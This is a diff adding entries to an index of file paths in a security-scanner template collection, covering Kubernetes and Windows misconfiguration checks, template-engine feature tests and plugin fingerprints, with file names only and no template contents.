+./poc/docker/k8s-root-container-admission.yaml ./poc/docker/kubernetes-allow-privilege-escalation-no-securitycontext.yaml ./poc/docker/kubernetes-api-detect.yaml ./poc/docker/kubernetes-dashboard-8526.yaml @@ -57433,6 +57530,7 @@ ./poc/extract/firebase-database-extractor.yaml ./poc/extract/headless-extract-values.yaml ./poc/extract/html-input-extractor.yaml +./poc/extract/http-matcher-extractor-dy-extractor.yaml ./poc/extract/js-endpoint-extractor.yaml ./poc/extract/raw-dynamic-extractor.yaml ./poc/extract/stop-at-first-match-with-extractors.yaml @@ -57476,6 +57574,7 @@ ./poc/favicon/wpfavicon.yaml ./poc/ftp/Joomla-sqli-aceftp.yaml ./poc/ftp/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml +./poc/ftp/allow-unencrypted-ftp.yaml ./poc/ftp/aws-sftp-detect.yaml ./poc/ftp/azure-nsg-ftp-unrestricted.yaml ./poc/ftp/crush-ftp-detect-1270.yaml @@ -57501,6 +57600,7 @@ ./poc/ftp/ftp-credentials-exposure.yaml ./poc/ftp/ftp-default-credentials.yaml ./poc/ftp/ftp-default-creds.yaml +./poc/ftp/ftp-service-running.yaml ./poc/ftp/ftp-weak-credentials-7569.yaml ./poc/ftp/ftp-weak-credentials-7570.yaml ./poc/ftp/ftp-weak-credentials.yaml @@ -57648,6 +57748,7 @@ ./poc/fuzz/alfabet-param-fuzzer.yaml ./poc/fuzz/blind_xss_fuzz_param.yaml ./poc/fuzz/cache-poisoning-fuzz.yaml +./poc/fuzz/fuzz-headless.yaml ./poc/fuzz/fuzz-mode.yaml ./poc/fuzz/fuzz-oauth.yaml ./poc/fuzz/fuzz-query.yaml @@ -59064,6 +59165,7 @@ ./poc/header/header_sqli.yaml ./poc/header/header_user_id.yaml ./poc/header/headless-header-action.yaml +./poc/header/headless-header-status-test.yaml ./poc/header/hidden-data-in-headers.yaml ./poc/header/hidden-http-header-injection.yaml ./poc/header/host-header-auth-bypass.yaml @@ -59191,6 +59293,7 @@ ./poc/http/http-etcd-unauthenticated-api-data-leak-8056.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak-8057.yaml ./poc/http/http-etcd-unauthenticated-api-data-leak.yaml +./poc/http/http-get.yaml ./poc/http/http-headers-11c701ce2d0af62ea084b4889e52e678.yaml ./poc/http/http-headers-1874737efbe46f20a3df6785022a5d61.yaml ./poc/http/http-headers-48720a0f8d87c88aeb0fd970b4ee767f.yaml @@ -59201,11 +59304,13 @@ ./poc/http/http-https-remover-6e1ff52e2bc9789e2496baff0910e72a.yaml ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml ./poc/http/http-https-remover.yaml +./poc/http/http-matcher-extractor-dy-extractor.yaml ./poc/http/http-missing-security-headers-8058.yaml ./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml +./poc/http/http-preprocessor.yaml ./poc/http/http-raw-multiple.yaml ./poc/http/http-raw.yaml ./poc/http/http-trace.yaml @@ -59262,6 +59367,9 @@ ./poc/http/mjniohttpdaemon.yaml ./poc/http/ms-mfc-httpsvr.yaml ./poc/http/muhttpd.yaml +./poc/http/multi-http-var-sharing.yaml +./poc/http/net-https-timeout.yaml +./poc/http/net-https.yaml ./poc/http/nhttpd-cve-2019-16278.yaml ./poc/http/nhttpd-cve-2019-16278.yml ./poc/http/oracle-http-server-12c-9381.yaml @@ -60511,6 +60619,7 @@ ./poc/javascript/nextjs-cve-2020-5284.yaml ./poc/javascript/nextjs-redirect.yaml ./poc/javascript/nextjs.yaml +./poc/javascript/nodejs-framework-exceptions.yaml ./poc/javascript/npm-cli-metrics-json.yaml ./poc/javascript/npm-package-lock-json.yaml ./poc/javascript/npmjs.yaml @@ -63252,6 +63361,7 @@ ./poc/microsoft/smartbi-db2-params-rce.yaml ./poc/microsoft/sms-alert-5a8aefff0a385c6f546517b576852be5.yaml ./poc/microsoft/sms-alert-ab1be4761d5f0b013fb19c3dff7678eb.yaml +./poc/microsoft/sms-alert-e7666c2e9949971a8cf15a29d904cf8b.yaml ./poc/microsoft/sms-alert.yaml ./poc/microsoft/sms-installer.yaml ./poc/microsoft/sms-ovh-6f857d605e5fcd96f0cfbefd07106552.yaml @@ -63949,6 +64059,7 @@ ./poc/nodejs/node-red.yaml ./poc/nodejs/nodebb-installer.yaml ./poc/nodejs/nodebb.yaml +./poc/nodejs/nodejs-framework-exceptions.yaml ./poc/nodejs/nodered-default-login.yaml ./poc/nodejs/npm-access-token.yaml ./poc/nodejs/npm-accesstoken.yaml @@ -76975,6 +77086,7 @@ ./poc/other/a-staff-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/a-staff-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/a-staff.yaml +./poc/other/a.yaml ./poc/other/a3-lazy-load-01e0339e4ed3a9879c77323cb875b088.yaml ./poc/other/a3-lazy-load-057a58dc3f044062ffd706f090536b9b.yaml ./poc/other/a3-lazy-load-299b0bf2827a81adc4c48415e4b30c25.yaml @@ -77025,6 +77137,7 @@ ./poc/other/a8_status_bypass.yaml ./poc/other/aa-calculator-64eaa613ea8e0f06d31971ba4e3fe6a7.yaml ./poc/other/aa-calculator.yaml +./poc/other/aaaa.yaml ./poc/other/aaha-chat.yaml ./poc/other/aajoda-testimonials-0c2f42e4ed4943c148a085a995d351f5.yaml ./poc/other/aajoda-testimonials.yaml @@ -78102,6 +78215,7 @@ ./poc/other/affiliate-toolkit-starter-a3f3e9cd8c92ca6bacbb8782a0b184d8.yaml ./poc/other/affiliate-toolkit-starter-aedad06672a5fe07e1a19e3cff437cf5.yaml ./poc/other/affiliate-toolkit-starter-dd1e988dd21e3ac940566e955d9ce37b.yaml +./poc/other/affiliate-toolkit-starter-dd5a0e0390a10aa5d721daf54dd2417d.yaml ./poc/other/affiliate-toolkit-starter-fd95f4b7f3e1c765b00cff7d7f780bd1.yaml ./poc/other/affiliate-toolkit-starter.yaml ./poc/other/affiliatebooster-blocks-e6d93b96c11e4a3efeb7abe59cdac85e.yaml @@ -78505,6 +78619,7 @@ ./poc/other/allow-cleartext-traffic.yaml ./poc/other/allow-svg-d699bbd1d441305fdcaa85c39ab88bb0.yaml ./poc/other/allow-svg.yaml +./poc/other/allow-untrusted-certificates.yaml ./poc/other/alltuts-1366c78d24a6434e6c80bc8524f1d146.yaml ./poc/other/alltuts-21bafad41e0ca9a1483df7dfbb454ba7.yaml ./poc/other/alltuts-31eb77eaefc61e112478e9f1952e822d.yaml @@ -78783,6 +78898,8 @@ ./poc/other/anonup.yaml ./poc/other/anonymous-restricted-content-a1c228113f48faf98c264ba16b96c84a.yaml ./poc/other/anonymous-restricted-content.yaml +./poc/other/anonymous-sam-enumeration-enabled.yaml +./poc/other/anonymous-sid-enumeration-enabled.yaml ./poc/other/ansible-semaphore-panel-327.yaml ./poc/other/ansible-semaphore-panel-328.yaml ./poc/other/ansible-semaphore-panel.yaml @@ -79071,6 +79188,7 @@ ./poc/other/arconix-faq.yaml ./poc/other/arconix-shortcodes-6211e427613ea6a179193b7355acf836.yaml ./poc/other/arconix-shortcodes-7a41a1e084cd2f3ac351e8264449d771.yaml +./poc/other/arconix-shortcodes-967c5b2184718a3fda197f1a2ade7c59.yaml ./poc/other/arconix-shortcodes-f5f9ec1a66da2f65afef7cacfc25a1c0.yaml ./poc/other/arconix-shortcodes.yaml ./poc/other/arcserve-panel.yaml @@ -79259,6 +79377,7 @@ ./poc/other/asp168-oho.yaml ./poc/other/aspect-control-panel.yaml ./poc/other/aspentech-aspen-infoplus21.yaml +./poc/other/aspnet-framework-exceptions.yaml ./poc/other/aspnet-mvc.yaml ./poc/other/aspnet-requestvalidationmode.yaml ./poc/other/aspose-cloud-ebook-generator-294ba58c1e6acec80965380b0e0e073c.yaml @@ -79459,6 +79578,8 @@ ./poc/other/audio.yaml ./poc/other/audiobookshelf-panel.yaml ./poc/other/audiojungle.yaml +./poc/other/audit-logging-disabled.yaml +./poc/other/audit-logs-not-archived.yaml ./poc/other/audit.yaml ./poc/other/audit.yml ./poc/other/augmented-reality-1c6032510cc675f4443ed5957cd5ebf8.yaml @@ -79497,6 +79618,7 @@ ./poc/other/auto-limit-posts-reloaded-55cbc2cb09e1fd50fee7e356fb4b87d9.yaml ./poc/other/auto-limit-posts-reloaded.yaml ./poc/other/auto-listings.yaml +./poc/other/auto-logon-enabled.yaml ./poc/other/auto-more-tag-61c212905e116f724d2f8c95ddab517b.yaml ./poc/other/auto-more-tag.yaml ./poc/other/auto-post-thumbnail-30d1ac5b32e1bde93d37b494d16d1e50.yaml @@ -79545,6 +79667,7 @@ ./poc/other/automatic-post-categories.yaml ./poc/other/automatic-user-roles-switcher-8b5505f4e63bd8c042be8593732ad583.yaml ./poc/other/automatic-user-roles-switcher.yaml +./poc/other/automatic-windows-updates-disabled.yaml ./poc/other/automatic-youtube-gallery-3ecc29bc027c0dadec1c48ed62e636d7.yaml ./poc/other/automatic-youtube-gallery-692fd342ca471e67560e976ed10efa16.yaml ./poc/other/automatic-youtube-gallery.yaml @@ -79557,6 +79680,7 @@ ./poc/other/automation-direct.yaml ./poc/other/automation_360.yaml ./poc/other/automatisch-panel.yaml +./poc/other/autoplay-removable-media-enabled.yaml ./poc/other/autoptimize-1cd3f0584531536972eeaec5bd981bf9.yaml ./poc/other/autoptimize-2ecfdf7e957d875bca93a4c9bd866fc9.yaml ./poc/other/autoptimize-44a1c78b812ff3de72de546c19550b76.yaml @@ -79579,6 +79703,7 @@ ./poc/other/autoresponder-gwa-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/autoresponder-gwa-plugin.yaml ./poc/other/autoresponder-gwa.yaml +./poc/other/autorun-scripts-startup-folder.yaml ./poc/other/autosave-net-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/autosave-net-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/autosave-net-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -80127,6 +80252,7 @@ ./poc/other/beaver-builder-lite-version-5b42cfef5da69a9668244c9c487eca3c.yaml ./poc/other/beaver-builder-lite-version-61ae33d7c990a629b171160654bc6e2e.yaml ./poc/other/beaver-builder-lite-version-6229d60925190e54ee6d1e7dfb1b109a.yaml +./poc/other/beaver-builder-lite-version-7d8fb493786dead17199a99ea743ec55.yaml ./poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml ./poc/other/beaver-builder-lite-version-8fb79d694642d9144754619ceddfad1c.yaml ./poc/other/beaver-builder-lite-version-9031f2623733acade8c80c6f38217e78.yaml @@ -82892,6 +83018,7 @@ ./poc/other/cname-fingerprint.yaml ./poc/other/cname-provider-assessment.yaml ./poc/other/cname-service.yaml +./poc/other/cname.yaml ./poc/other/cnet.yaml ./poc/other/cnoa-oa.yaml ./poc/other/cnpower-oa.yaml @@ -82950,6 +83077,9 @@ ./poc/other/code-snippets-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/code-snippets-plugin.yaml ./poc/other/code-snippets.yaml +./poc/other/code-template-1.yaml +./poc/other/code-template-2.yaml +./poc/other/code-value-share-workflow.yaml ./poc/other/code42-panel.yaml ./poc/other/codeberg.yaml ./poc/other/codecademy.yaml @@ -83252,6 +83382,7 @@ ./poc/other/complete-gallery-manager.yaml ./poc/other/complete-open-graph-6519feb88108a3aa2842460ecf7f8889.yaml ./poc/other/complete-open-graph.yaml +./poc/other/complex-conditions.yaml ./poc/other/complianz-gdpr-108d0a02108af71158dae68a81c5757c.yaml ./poc/other/complianz-gdpr-16022b20d3dcb407f1909f705bc37713.yaml ./poc/other/complianz-gdpr-2d5670a5dd8a4ab1e33992b33ecf5dfe.yaml @@ -83310,6 +83441,7 @@ ./poc/other/concrete5-panel-1172.yaml ./poc/other/concrete5-panel-1173.yaml ./poc/other/concrete5-panel.yaml +./poc/other/conditional-flow.yaml ./poc/other/conditional-menus.yaml ./poc/other/coneblog-widgets-bc060695098fbf1df6eb67d564047f66.yaml ./poc/other/coneblog-widgets-ec4fe1cabb457f15256813e0e7ad1522.yaml @@ -85191,6 +85323,7 @@ ./poc/other/disable-image-right-click-09712df89f849ba85b08f5f0deb0865b.yaml ./poc/other/disable-image-right-click.yaml ./poc/other/disable-pad-service.yaml +./poc/other/disable-path-automerge.yaml ./poc/other/disable-update-notifications-8ee51f427b6ac5677236482a75c41622.yaml ./poc/other/disable-update-notifications.yaml ./poc/other/disabledrocks-mastodon-instance.yaml @@ -85223,6 +85356,7 @@ ./poc/other/display-admin-page-on-frontend.yaml ./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml ./poc/other/display-custom-post.yaml +./poc/other/display-last-username-enabled.yaml ./poc/other/display-medium-posts-401d7bc9b676ef7419913f7165176129.yaml ./poc/other/display-medium-posts.yaml ./poc/other/display-metadata-b28114b5979504523967bcc431ea65ea.yaml @@ -85323,6 +85457,7 @@ ./poc/other/dns-320_firmware.yaml ./poc/other/dns-320l.yaml ./poc/other/dns-multiple-example.yaml +./poc/other/dns-ns-probe.yaml ./poc/other/dns-value-share-template-3.yaml ./poc/other/doc.yml ./poc/other/docebo-elearning-panel.yaml @@ -85600,6 +85735,7 @@ ./poc/other/download-shortcode.yaml ./poc/other/download-theme-e45971e156997d8c7d2b6559578b139e.yaml ./poc/other/download-theme.yaml +./poc/other/download-unsigned-activex-allowed.yaml ./poc/other/download-zip-attachments-c19574fadacaf2b4beb86feecc53bb8f.yaml ./poc/other/download-zip-attachments.yaml ./poc/other/download_any_file.yaml @@ -87407,6 +87543,7 @@ ./poc/other/eureka-server.yaml ./poc/other/eusestudy.yaml ./poc/other/evaluate-04eec8ce4ae8f89c6df8d530479c7189.yaml +./poc/other/evaluate-variables.yaml ./poc/other/evaluate.yaml ./poc/other/evarisk-371811fcd6d1fa9c8ade9c404e2f3d94.yaml ./poc/other/evarisk-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -87731,6 +87868,7 @@ ./poc/other/exclusive-addons-for-elementor-8b5117829a5837670e10088058260249.yaml ./poc/other/exclusive-addons-for-elementor-9232d1d5b380e1fb660f57382e4f5956.yaml ./poc/other/exclusive-addons-for-elementor-a42237150a7b86a7d66cdff228d7a407.yaml +./poc/other/exclusive-addons-for-elementor-a72af3b32854656a4c8be56907be5fd5.yaml ./poc/other/exclusive-addons-for-elementor-aa36477eab476e17cbcabf7d3a68b95d.yaml ./poc/other/exclusive-addons-for-elementor-b22002f853e25973049d1d1881d3b198.yaml ./poc/other/exclusive-addons-for-elementor-b3bcca96e1c875ed49e977324ed1d1bf.yaml @@ -87852,6 +87990,7 @@ ./poc/other/export-users-to-csv.yaml ./poc/other/export-users.yaml ./poc/other/exported-activities.yaml +./poc/other/exported-response-vars.yaml ./poc/other/exports-and-reports-94039fda9d0f7d44d90111c7b7a1acdc.yaml ./poc/other/exports-and-reports.yaml ./poc/other/expose-56a69c984e02d7b046a1210573165bd4.yaml @@ -88326,6 +88465,7 @@ ./poc/other/filemaker.yaml ./poc/other/filemakerpro.yaml ./poc/other/filenice.yaml +./poc/other/fileorganizer-24cbdfd1a4d8ff126da4bd032282a39c.yaml ./poc/other/fileorganizer-7bc8d0bd12af84611e3b51967c2247fa.yaml ./poc/other/fileorganizer-ffbed6540cd0ed660ed2118f5ce9a483.yaml ./poc/other/fileorganizer.yaml @@ -88678,6 +88818,7 @@ ./poc/other/floating-tweets.yaml ./poc/other/flog-20118fea81b5361eadc12e13766b8d59.yaml ./poc/other/flog.yaml +./poc/other/flow-hide-matcher.yaml ./poc/other/flowci-panel.yaml ./poc/other/flowcode.yaml ./poc/other/flower-celery-monitoring-tool.yaml @@ -89822,6 +89963,7 @@ ./poc/other/get-directions.yaml ./poc/other/get-env(1).yaml ./poc/other/get-env.yaml +./poc/other/get-hotfix.yaml ./poc/other/get-iam-users.yaml ./poc/other/get-override-sni.yaml ./poc/other/get-query-string.yaml @@ -90430,6 +90572,7 @@ ./poc/other/guardgiant.yaml ./poc/other/gucherry-blog-e13b070536bec06d15a834eb59d2fbcb.yaml ./poc/other/gucherry-blog.yaml +./poc/other/guest-account-enabled.yaml ./poc/other/guestofy-restaurant-reservations-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/guestofy-restaurant-reservations-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/guestofy-restaurant-reservations-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -90660,9 +90803,12 @@ ./poc/other/hdw-tube-9100e4d231772ba56c0f695e35e4a42d.yaml ./poc/other/hdw-tube.yaml ./poc/other/hdwiki.yaml +./poc/other/headless-1.yaml ./poc/other/headless-basic.yaml ./poc/other/headless-payloads.yaml ./poc/other/headless-reflected-pitchfork.yaml +./poc/other/headless-self-contained.yaml +./poc/other/headless-waitevent.yaml ./poc/other/headline-analyzer-9cfd0508d6a9c79dfc8e808ca55da66f.yaml ./poc/other/headline-analyzer.yaml ./poc/other/headway-b54840b9c0da3f7fd9c41b07df4e5943.yaml @@ -91355,6 +91501,7 @@ ./poc/other/identityguard-selfservice-entrust-8142.yaml ./poc/other/identityguard-selfservice-entrust-8143.yaml ./poc/other/identityguard-selfservice-entrust.yaml +./poc/other/idle-timeout-Interval.yaml ./poc/other/idonate-1ace5675b1d0e0c2c55b706529d8c6a1.yaml ./poc/other/idonate.yaml ./poc/other/idpay-contact-form-7-e3b0819e93c2e92645175f698a388c69.yaml @@ -91873,6 +92020,7 @@ ./poc/other/inquiry-cart.yaml ./poc/other/insanejournal.yaml ./poc/other/insecure-broadcast-receiver.yaml +./poc/other/insecure-cipher-suites-enabled.yaml ./poc/other/insecure-content-warning-6c90b20a33edd819f7562bd7a9738958.yaml ./poc/other/insecure-content-warning.yaml ./poc/other/insecure-data-storage.yaml @@ -92038,6 +92186,7 @@ ./poc/other/interactive-world-maps-fcdf26721454bc7cbb87f06418e98ace.yaml ./poc/other/interactive-world-maps.yaml ./poc/other/interactivevirtualshipdisplaysystem.yaml +./poc/other/interactsh-requests-mc-and.yaml ./poc/other/interactsh-server-8165.yaml ./poc/other/interactsh-server.yaml ./poc/other/interactsh-stop-at-first-match.yaml @@ -92256,6 +92405,7 @@ ./poc/other/itchio.yaml ./poc/other/itenable.yaml ./poc/other/iterable.yaml +./poc/other/iterate-one-value-flow.yaml ./poc/other/ithemeland-bulk-posts-editing-lite.yaml ./poc/other/ithemelandco-woo-report-3ead2ac6f8a1104bbcbbe99a51622308.yaml ./poc/other/ithemelandco-woo-report.yaml @@ -92768,6 +92918,25 @@ ./poc/other/justified-image-grid.yaml ./poc/other/jxt-consulting.yaml ./poc/other/jymusic.yaml +./poc/other/k8s-allow-privilege-escalation-set.yaml +./poc/other/k8s-cpu-limits-not-set.yaml +./poc/other/k8s-cpu-requests-not-set.yaml +./poc/other/k8s-host-network-namespace-shared.yaml +./poc/other/k8s-host-pid-namespace-sharing.yaml +./poc/other/k8s-host-ports-check.yaml +./poc/other/k8s-image-pull-policy-always.yaml +./poc/other/k8s-image-tag-not-fixed.yaml +./poc/other/k8s-memory-limits-not-set.yaml +./poc/other/k8s-memory-requests-not-set.yaml +./poc/other/k8s-minimize-added-capabilities.yaml +./poc/other/k8s-netpol-egress-rules.yaml +./poc/other/k8s-netpol-namespace.yaml +./poc/other/k8s-network-ingress-rules.yaml +./poc/other/k8s-readiness-probe-not-set.yaml +./poc/other/k8s-readonly-fs.yaml +./poc/other/k8s-readonly-rootfs.yaml +./poc/other/k8s-root-user-id.yaml +./poc/other/k8s-seccomp-profile-set.yaml ./poc/other/kadence-blocks-16166425b66ab654e6c5785538325240.yaml ./poc/other/kadence-blocks-18a42b214d398c8d7d69290d164a5fb5.yaml ./poc/other/kadence-blocks-241c6c10a313398faffdf21714d7ccca.yaml @@ -92833,6 +93002,7 @@ ./poc/other/kaswara-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/kaswara-plugin.yaml ./poc/other/kaswara.yaml +./poc/other/kata-plus-36c5b8e23edc73cc63396a6195be2274.yaml ./poc/other/kathmag-236bed5b5a49a6173251e991d6ca44d1.yaml ./poc/other/kathmag-d2a46afd6d61289094ec49e6cf79a7c7.yaml ./poc/other/kathmag.yaml @@ -93466,9 +93636,11 @@ ./poc/other/learn-manager-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/learn-manager-plugin.yaml ./poc/other/learn-manager.yaml +./poc/other/learning-management-system-2928d4688fb415c9cbca95396899c99f.yaml ./poc/other/learning-management-system-29aeba2a433f8692c0aacdf6d1ea6acb.yaml ./poc/other/learning-management-system-6c0e04cbc2da4388f81a8caa6d6b8191.yaml ./poc/other/learning-management-system-7c31e6671c937327ff1564eccbf43be8.yaml +./poc/other/learning-management-system-91dd199724129d4d681d2379143caddc.yaml ./poc/other/learning-management-system-d39d6c1f84e5236c7d49d1e68072221d.yaml ./poc/other/learning-management-system-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/learning-management-system-fa2ccc72a92978caad1b961487785ac8.yaml @@ -93886,6 +94058,8 @@ ./poc/other/liveview-axis-camera.yaml ./poc/other/livezilla.yaml ./poc/other/lkpoweroa.yaml +./poc/other/llmnr-disabled.yaml +./poc/other/lm-hash-storage-enabled.yaml ./poc/other/lnmp.yaml ./poc/other/loading-page-703919aaf3ac5207e458fe86bf1026b0.yaml ./poc/other/loading-page.yaml @@ -94794,8 +94968,11 @@ ./poc/other/mastown-mastodon-instance.yaml ./poc/other/match-1.yaml ./poc/other/match-2.yaml +./poc/other/match-3.yaml ./poc/other/matcher-name.yaml +./poc/other/matcher-status.yaml ./poc/other/matcher-with-and.yaml +./poc/other/matcher-with-nested-and.yaml ./poc/other/matcher-with-or.yaml ./poc/other/material-design-for-contact-form-7-597cb0aecccef3143168fab5a0d89442.yaml ./poc/other/material-design-for-contact-form-7.yaml @@ -95877,6 +96054,7 @@ ./poc/other/multi-rating-cc792d8a685645d918ffa1ca3b54f7dc.yaml ./poc/other/multi-rating-fee6d305d8448a1b6afd09f68f9ab4ff.yaml ./poc/other/multi-rating.yaml +./poc/other/multi-request.yaml ./poc/other/multi-scheduler-7c0587b156a0100b0a9665a34fd1f7ed.yaml ./poc/other/multi-scheduler.yaml ./poc/other/multi-sslvpn-gateway.yaml @@ -95902,6 +96080,8 @@ ./poc/other/multilist-subscribe-for-sendy-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/other/multilist-subscribe-for-sendy-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/multilist-subscribe-for-sendy.yaml +./poc/other/multimatch-value-share-template.yaml +./poc/other/multimatch-value-share-workflow.yaml ./poc/other/multimedial-images.yaml ./poc/other/multiplayer-plugin-bf5a6246079c80944f63d6f8406a09f9.yaml ./poc/other/multiplayer-plugin.yaml @@ -95929,6 +96109,10 @@ ./poc/other/multiple-roles-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/multiple-roles-plugin.yaml ./poc/other/multiple-roles.yaml +./poc/other/multiproto.yaml +./poc/other/multiprotocol-value-share-template.yaml +./poc/other/multiprotodynamic.yaml +./poc/other/multiprotowithprefix.yaml ./poc/other/multipurpose-1e7fa5b1ad541907b1348192f97e6162.yaml ./poc/other/multipurpose-block-c76d49de417bda8e5a8ec87823f6f2ea.yaml ./poc/other/multipurpose-block.yaml @@ -96296,9 +96480,11 @@ ./poc/other/nessus-panel-9020.yaml ./poc/other/nessus-panel.yaml ./poc/other/nessus.yaml +./poc/other/net-multi-step.yaml ./poc/other/netapp-data-ontap.yaml ./poc/other/netapp-netcache-appliance.yaml ./poc/other/netartmedia-real-estate-portal.yaml +./poc/other/netbios-disabled.yaml ./poc/other/netbotz-network-monitoring-device.yaml ./poc/other/netbox.yaml ./poc/other/netcom-ngfw.yaml @@ -96372,6 +96558,8 @@ ./poc/other/netweaver.yaml ./poc/other/netweaver_development_infrastructure.yaml ./poc/other/netwin-surgemail.yaml +./poc/other/network-discovery-public-enabled.yaml +./poc/other/network-port.yaml ./poc/other/network-publisher-08150a918a03f0e1752e603684201c24.yaml ./poc/other/network-publisher-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/network-publisher-e61ff719b0d272a313f2577b9c7fd6fe.yaml @@ -96517,6 +96705,7 @@ ./poc/other/newsletters-lite-b0cc4281fd93ff1b522600f1f3879e43.yaml ./poc/other/newsletters-lite-b2a597d15cc95893a967a720d7dd6cd0.yaml ./poc/other/newsletters-lite-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/newsletters-lite-e4e61a63407c312b8137011c7ea6ce20.yaml ./poc/other/newsletters-lite-eb6c1a0a90dd146ae8395aa9410246b4.yaml ./poc/other/newsletters-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/newsletters-lite-plugin.yaml @@ -96918,6 +97107,7 @@ ./poc/other/ns-asg.yaml ./poc/other/ns-coupon-to-become-customer-7937a8d2d4473985a3f546f6a2747fbf.yaml ./poc/other/ns-coupon-to-become-customer.yaml +./poc/other/ns.yaml ./poc/other/nsasg-arbitrary-file-read.yaml ./poc/other/nsc-d9efe976440ba902e2d8d4a9e3c771cc.yaml ./poc/other/nsc.yaml @@ -96954,6 +97144,7 @@ ./poc/other/nuance-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/nuance-theme.yaml ./poc/other/nuance.yaml +./poc/other/nuclei-flow-dns-prefix.yaml ./poc/other/nuclei-openssl.yaml ./poc/other/nuclei.yaml ./poc/other/nuclei_template.yaml @@ -99044,7 +99235,9 @@ ./poc/other/post-snippets.yaml ./poc/other/post-state-tags-5381d68755a15a855c024e83bb2aa0cb.yaml ./poc/other/post-state-tags.yaml +./poc/other/post-status-notifier-1f96a6ee00d3cc511b2ed232d5c404c1.yaml ./poc/other/post-status-notifier-lite-0d82f27fd581534cd044b87e17d81bed.yaml +./poc/other/post-status-notifier-lite-1f96a6ee00d3cc511b2ed232d5c404c1.yaml ./poc/other/post-status-notifier-lite-c4afe69796283be00be766e93c696a9d.yaml ./poc/other/post-status-notifier-lite.yaml ./poc/other/post-teaser-09875439e46c3ed63c2a03f3c27e609a.yaml @@ -99264,6 +99457,7 @@ ./poc/other/premium-addons-for-elementor-86a061cf263c6244aed3c4d36713ada4.yaml ./poc/other/premium-addons-for-elementor-89c8ef165ad8eb1f38be461aab6abce0.yaml ./poc/other/premium-addons-for-elementor-900e2749f372068583dfd8bcadfb17a9.yaml +./poc/other/premium-addons-for-elementor-90c620c52803efe7bafe8790411d6928.yaml ./poc/other/premium-addons-for-elementor-b149032d631895734a90fe70afaff5d3.yaml ./poc/other/premium-addons-for-elementor-ba3a723e91e3a4f9f08a70b3aaec11bc.yaml ./poc/other/premium-addons-for-elementor-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -99422,6 +99616,7 @@ ./poc/other/private-files.yaml ./poc/other/private-only-d6d91f6cec50e66c8aa8b7d27ce9d5ae.yaml ./poc/other/private-only.yaml +./poc/other/privesc-agetty.yaml ./poc/other/privx-panel.yaml ./poc/other/pro-links-maintainer-dev-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/pro-links-maintainer-dev.yaml @@ -99695,6 +99890,7 @@ ./poc/other/prtg-workflow.yaml ./poc/other/prtg_network_monitor.yaml ./poc/other/prvpl.yaml +./poc/other/ps1-snippet.yaml ./poc/other/psmessage.yaml ./poc/other/psstaudio.yaml ./poc/other/pt-elementor-addons-lite-14963541d2314ab58423512ed4bb3c81.yaml @@ -99786,6 +99982,10 @@ ./poc/other/putty-phish.yaml ./poc/other/pwgrandom-1aa979b3cc5c2a691e4af675add989c2.yaml ./poc/other/pwgrandom.yaml +./poc/other/py-file.yaml +./poc/other/py-interactsh.yaml +./poc/other/py-nosig.yaml +./poc/other/py-snippet.yaml ./poc/other/py_settings-py.yaml ./poc/other/py_settings.yaml ./poc/other/pygopherd.yaml @@ -100035,6 +100235,7 @@ ./poc/other/quickswish.yaml ./poc/other/quilium-panel.yaml ./poc/other/quitterpl.yaml +./poc/other/quivr-panel.yaml ./poc/other/quixplorer.yaml ./poc/other/quiz-expert-fdc3f1ee4d1b437017771844d1ce9c56.yaml ./poc/other/quiz-expert.yaml @@ -100284,9 +100485,11 @@ ./poc/other/ravpage.yaml ./poc/other/raw-get-query.yaml ./poc/other/raw-get.yaml +./poc/other/raw-path-single-slash.yaml ./poc/other/raw-path-trailing-slash.yaml ./poc/other/raw-payload.yaml ./poc/other/raw-post-body.yaml +./poc/other/raw-unsafe-path-single-slash.yaml ./poc/other/raw-unsafe-path.yaml ./poc/other/raw-unsafe-request.yaml ./poc/other/ray-dashboard.yaml @@ -101623,6 +101826,7 @@ ./poc/other/sam-pro-lite-138765af8c050b523b31a472b620b032.yaml ./poc/other/sam-pro-lite-1b374195caca5f994c60dff13d949a09.yaml ./poc/other/sam-pro-lite.yaml +./poc/other/same-address.yaml ./poc/other/sandu-oa.yaml ./poc/other/sangar-slider-lite-480a53835ea6b15438ece6e1d045bf8a.yaml ./poc/other/sangar-slider-lite.yaml @@ -102196,6 +102400,7 @@ ./poc/other/setka-editor.yaml ./poc/other/setlistfm.yaml ./poc/other/seur-1119763f95fdfb714e33317ed8a4290b.yaml +./poc/other/seur-710adeba52f1b42ddecb78da2e1d3776.yaml ./poc/other/seur-a3b06a9eaef8c9e7e76c1f6ce446151f.yaml ./poc/other/seur.yaml ./poc/other/sexworker.yaml @@ -102210,6 +102415,7 @@ ./poc/other/sf-booking-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/sf-booking-theme.yaml ./poc/other/sf-booking.yaml +./poc/other/sf2-profiler-exploit.yaml 